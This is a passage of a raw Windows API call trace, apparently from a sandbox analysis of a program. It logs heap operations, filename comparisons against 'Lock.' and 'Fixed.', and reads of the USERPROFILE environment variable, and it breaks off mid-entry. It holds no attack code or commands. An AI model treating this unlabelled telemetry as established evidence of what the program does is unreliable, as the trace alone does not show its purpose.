hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PN5TTWYWv642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N5TTWYWv642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5TTWYWv642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTWYWv642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TWYWv642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WYWv642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YWv642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wv642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="642BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="42BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0149.479] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0149.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2a698b0 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PN5TTWYWv642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N5TTWYWv642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5TTWYWv642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTWYWv642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TWYWv642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WYWv642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YWv642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wv642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="642BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="42BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61b0 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.481] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0149.481] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0149.482] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0149.482] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0149.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0149.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0149.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0149.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0149.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0149.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.487] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0149.487] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0149.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0149.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0149.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0149.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0149.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0149.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0149.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.490] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 